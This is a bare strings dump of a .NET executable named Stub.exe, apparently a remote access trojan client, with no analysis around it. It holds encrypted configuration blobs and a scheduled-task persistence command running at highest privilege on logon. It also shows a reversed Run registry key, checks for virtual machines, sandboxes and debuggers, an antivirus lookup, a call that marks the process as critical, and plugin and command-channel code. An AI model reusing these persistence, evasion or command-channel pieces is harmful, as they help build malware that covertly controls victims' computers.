!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
ToUInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
USloukXYFA
alXxDVecJkOA
BnnnyYwOEWPA
tqDYqUbRVVB
bnmxwTiURNwaB
DvwnWZisIiB
oUflBfUjbzrvB
sYHfaUekMHAKC
ErplPaDnMEXnQC
OoqFLfVcHaC
TMyduYccGXlZppC
DEVXHAepvbSDorC
BwAJNPuUTkTgbdwC
vSXgpoOUcqSGFD
gIdcaqqpGD
MapNameToOID
get_FormatID
lVHKHlPWwSKD
LrasrkkKchKD
bBvpxwUgyVEsqD
tEOakFaSyzJE
XwWJEbmJbdDGLE
fxbvkrRwxMrOZaE
MbCzZJbWXcE
WDgTaqArhSkE
QecTHVzgiHxE
mukFJFzlfYphF
yVhCBXEPyeoeqrF
pHjnTSlCXGCsF
ZdIksyUVwsZdBDG
zbPpNTySjONG
CrlsWssfkgG
iBoElSFaqKXwjG
iUjTgVdiGWoG
ItuoxPTJtKCH
czYigYCjzKQH
lUVCXSHpEIcibrWH
TAByXPmXxdTXH
KvXSVBCTzaH
vcnpRSNcRvqH
lrjeeTJEwjsH
gETAxVsKiHI
get_ASCII
TApUSLWeJkvEMI
KKlNwZDEtRoMI
YtuNYEVMNNI
VLhuHcCYZI
QoaiCtXxwjI
yObJyqzPzpI
wlYseaZRKptAzrI
IqjwzzyPmtvtI
LdwoYHGonkPwuI
gAOUGkNyOBJ
mppPxZnGloWOJ
gPwfNbBOYtiZJ
QgMqUQnnHmJ
oasqBqYcyHK
XURfHgOxMK
AYTKQPPsJmOjNK
AciMlJbQCJJAZK
yuJqHFyfczK
MwbMRsrcBvoBBL
miKuKHGTOdHCDjFL
rTtVkAUgdMvFL
DKIwYpRLIPL
nrcGKFsFQL
jojuWFWpEGJBM
tuBAJauIFJdDM
LEIAhiepxiRM
wWHdzvxSwNLhsSM
PuzYeqOSAwXM
NtXJldtANgBN
YJhnMlfiXuVWJN
freapHCByXiSN
QLmNNCzZmzHuvnjN
rIqbwnhXFDO
System.IO
pKqMSOiwwYXIO
PDMJFdCenKorUVQO
OdGgRjWGcXO
onlHjuXnVOkJZO
zFZZYHtVKdIPkO
FXkAtUsdQCAP
lgOyZrGCLVHP
pXuyDGoHOP
KoDySvrhTrP
NBJxtjeEVmtxP
NhRmCpLWdgLIEQ
AhTmXlvcZUUIQ
RKetlvYIVZIyuOQ
NogNcPQgDhfePpslQ
NqwbitkZLbzoQ
AIzyLbLsuuQ
rYFrAoWuOmJR
ZQlzqisUKR
MLrenWbfTcR
jyHGdzOIyKjR
qcGtRsWJXDBqR
QexQEpnudDFyKuR
GSkoDGGXxR
fldmYaDfFS
LtviGBELwmSLS
ENNbErJFEnlLS
phrKDspHBozTS
kghzSFkQxqgiPcS
YocfipPXxbfS
QcwDuyjdqeEhLeEooS
gmfPTyyBBlET
TaLfHzalobAmXKT
EcDKxNWhxKT
snubcAFMNT
ytcGgtRYtNT
CKSFtKOvoAwOPT
LfUzKQtcJrXT
UzuyNlPxKWBpZT
MqjxfOuNuGypoT
hQonvzReGUxroT
OCmbIGXdtFU
DhfjhOAKdRQJIU
ZpdgHSpDIbJU
PwtYJcuKIHhyUU
lStuUoNCHIVcU
skKZPTkfyYeU
FqUPjXxAUnCiU
shrAmpiNUmU
AYwrqHkAFyTJpU
trfGXbkvHXQSXyU
get_IV
set_IV
GenerateIV
dcgqfTdMHgkIV
XuygmOXYoxRV
XTBcjiTKMKsV
BiXlAPpgUGtV
hipMqPNHFxRKW
xVABeYfrTZxHLW
rHUVDEIyHIaW
buIEYorzAsMNdW
nIeISeDudW
ScntrtNjhihW
tlcJnDGmwhW
wbaklrtlnHsiW
OFmXwxzienW
TEbDZUWyVLtW
yNzlyPwwnrzCX
HBUErrPlWDQKX
MTvsEFwiZHEiMX
SLDdYGmkRX
gGosznOPLpPhSX
UNdcVmIoYuVX
OzzvNlaGKkWX
pSFkziEAtNAdX
lFZgVMsNmufX
eiTxlPrfCuGMhX
GYhKchbMGsthX
NvNtaxqyvDPCY
rgNwJRjZCY
GloqPihugYNY
FSpFqavKztWTY
lHYfkaMqzrXY
jEFwtXgGuaY
OVCQCGEPmY
GzQqweDQZGBZ
xSFTFupDIJZ
WpQSHvbZukyNZ
YxJVCMEGPJjZ
QRPhrqXOBzZ
value__
TLipTicEqtizBa
xHcgFmtzvCQeYFa
LpNDmrnuSDGwHa
mGkEirIvWa
mbBvoArcypfa
dhQkfFIRXga
dAtJMcpMLspa
bWAcvsXDPtta
YyWENeyfJGb
mEZeAiWIPyGb
KblvlfrUYIb
kPQtQCWHSCTANb
QqtuobqKMEQb
IGfRAmaXcb
mscorlib
BTqijZYkUCob
jDAIttGpxmRc
ejiIgErZUc
YymNZnUEDuUc
UkcqOLnIQOanIVc
lgcleEAQbfc
GUEBTqgTKegc
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
yLIwaPpQUOSRWd
ciKZgJfdqxmeZd
EndRead
BeginRead
Thread
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
pYgXypRzxHahd
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
Append
RegistryValueKind
XvDbVjVoUkiqGrZod
TiZaNCPSPCpd
dNkuJojzBZqrd
aztfhvcRSvd
WehHRhpszJpKe
jMTdkqBUUDce
yTsDqouFEKoGce
xWSfnBkQsJce
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
KjUfSKZhEee
DeleteSubKeyTree
get_Message
Invoke
YtxiOELHohske
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
RPnzrkfMRRBiBf
iPINNaYACObMf
RhnIkSXaXDQf
BgHNxNmMUgRf
aCplPrvyuGDTf
uyjQLTkCMtVf
nEjZEJgngWSMIWf
sUHmIQcxXf
OKTZGPgpAltdf
uELZWMGvzgf
JMGOmqriTUjPwMFg
rnyNGukmOFJzMg
LDVjXjNssfvwQg
VAeQWftfDgbWg
CryptoConfig
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
SWgqHTWiTdpg
eRCkPKYDIrKBh
ideaKytrKEGCLh
KLtbhyTaMhSMh
ChOEunroIdNHUUh
wjFXcGuZtRyXIah
MNIfiufCdfPDLXTeh
MbBUtgpwih
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
get_Length
UJQhltrqgnexh
oJwqhPFlgxkvkHCi
TPatGmuElmZBPDi
CwwMYGeGnbyvsEi
kBBNPcQiKzZHi
lHriOddreFczgLi
hzjilpRnibMi
qOKiovIPBPCdi
EcgMiyoaCwei
GwbGpIWsvcqyCmji
RFTLivPgFBsqYUNli
vDHJppFMBti
zcPTRpSoRzijFj
JUIePwpcuRGj
xIVlaHxesUj
ClbpcqAJtBTOmaj
SbsKeGNNWpj
pwvltwmhsj
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
IbuKJvHcBkfdk
BSokVERFyfk
oZfeAjqRrQouqmhk
luFQuPwVICwIOl
gbhGViEuYwoMYl
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
kernel32.dll
user32.dll
ntdll.dll
RYxQCsjbnZCyl
XKgxUwhvTGm
wMvTKNRZTjKm
VnaFLOwvgSNm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
BZSgvWqQQmnm
Random
ICryptoTransform
UHNdspkjUFAn
yHsQvMPzFEyrHn
vrOIbLLYHfUfNn
lYPnxOmgQn
ToBoolean
ICEALLBRyOgn
X509Chain
AppDomain
get_CurrentDomain
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
zWaBnSxeqwQhqn
VDlahWakPVfWjBo
NsMdCrKdNQo
klsbYhSxLGeo
ImageCodecInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
taskkdXcNVho
kyKnzGVJUwo
eobliJekIXGfyo
HeKPYZRiLGGp
cxkBYtKCHMPp
cyXmbWlwoSpkjcp
Microsoft.CSharp
LraHLIbxVup
ewPvxeZSfnSivp
nirBpTUYNPfLq
kahRvUtrwEiJaQmteq
RzCXivzDxYfq
zDJPWbecqSyXaIqkq
System.Linq
UfpYsNSILgetq
xVZibXCzATFytq
reMudYtEYcOAr
EgfgxRPuYbFADr
LoKlxYmSSGAGr
dnNPkhGdMKSnOuIr
QEcgXZnjqvBNOr
VnzSNOrqOQr
GJHGtJigBdHCXUr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
eqVvmOQheiVsr
IntPtr
ohsnKWOGuABs
jgbrqboOOs
ZFwimVEzAUAIRs
fFrUWvTfcvas
System.Diagnostics
UCJJLDbvqds
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
FxwMQlQerYrGfs
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
QRPxRzvswjs
lUvhygxtknZGls
ICredentials
set_Credentials
Equals
aHmXLGfils
SslProtocols
System.Windows.Forms
TqVdVwmlBFJIns
Contains
System.Collections
StringSplitOptions
viLPTVtUOhJXnos
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
CODCmaLnYfCAt
qiAKtPqROJIt
KzAWWaGRriFaKt
TykWgOUEHRt
OnJlMqXlNZzgNTt
GcUCixTOQDGSWt
Concat
ImageFormat
get_AsFloat
set_AsFloat
UfguPNZreebt
ManagementBaseObject
Collect
Connect
pGOMfMpMIlpOhdt
SQyctHAgaakdt
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
IAsyncResult
ToUpperInvariant
WebClient
AsyncClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
ParameterizedThreadStart
Convert
FailFast
ToList
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
SAZIJbwixt
pMvZvgyBsUu
DYxYhyYAbKju
lFjSfOPEgjEv
KUilvpYSsvgKbTv
GyJAMhhuFVDVQav
OAoQdDoZiTzYmv
nQsIExpDGvrv
BLTIrQAuXnFw
nEcssOvmqwFw
IMYvnLxFjMIw
COeIirBYXULw
qpfADKqsPDCNDysRw
GetForegroundWindow
set_CreateNoWindow
GIHwgpltJIcjow
aNKxbrYAulfBx
FIUVFTQsIFx
zsXAHQitpuHIx
lAPYOrcPTKVKx
WayxUiYsQidzdmBLx
FQAsGXyPxgOx
nEzLFSZBJLGgUscx
yqIqSQShex
rRPrEEZqeokrHlx
qRLldprIYDXwx
ErkbYLUikEy
RkLnlmzXPFeFy
XjjIKntImxKhLyJy
qXFlwGWUMy
ajZicWaJWBSXJcXy
YOMIMFGMfDklYy
pMlvPSldQVWLJaZy
InitializeArray
ToArray
get_AsArray
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
EFLuqCtbUIz
DjjPvbvmCdIz
htzelXOwMPz
SItIJwzfeBWQz
jzvZxcsQWz
YUcEVyoRuBrZz
QkTThlDOBZuz
shxHrsCcspdxuz
IYIcSbdlMBzvz
jzGJIrOlAMlHVwz
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName .NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
Ixq/xOKXPRiAPG1Ki8X7yqVncyeg3n9mHssW2nhdjtj6jaclZgZsBMn40O+fzUamInNximj0mpUpRReVZXAe9A==
ahZL+4b5ro4j//bUKTOOw7L7Phs2H4F74TlMlhLO04ZweP0Uz0ReMzIWVZD35coCOQEIwvUU8g3Ez1BOMTaOlFAAJOkZxKUZinf1YRW4Pco=
uFOCAR7QwVh6V2uxLQ8lEbimMn1mDZFIotS6K1nk2mLTA4DWtWpDXT0JF3ujbh9azMCByRUzQy18pr7mGYZ8znIjiyC1MyQ/jkfTU7bad4Q=
HctwfhdiYZPfRX55bHBmOTALdjvJEwxtA5OaDcYMwqxl7W28a6VtH5ZXAUZnlU5tVcvdZWkgKM9g28CIMPhi9g==
%AppData%
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
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0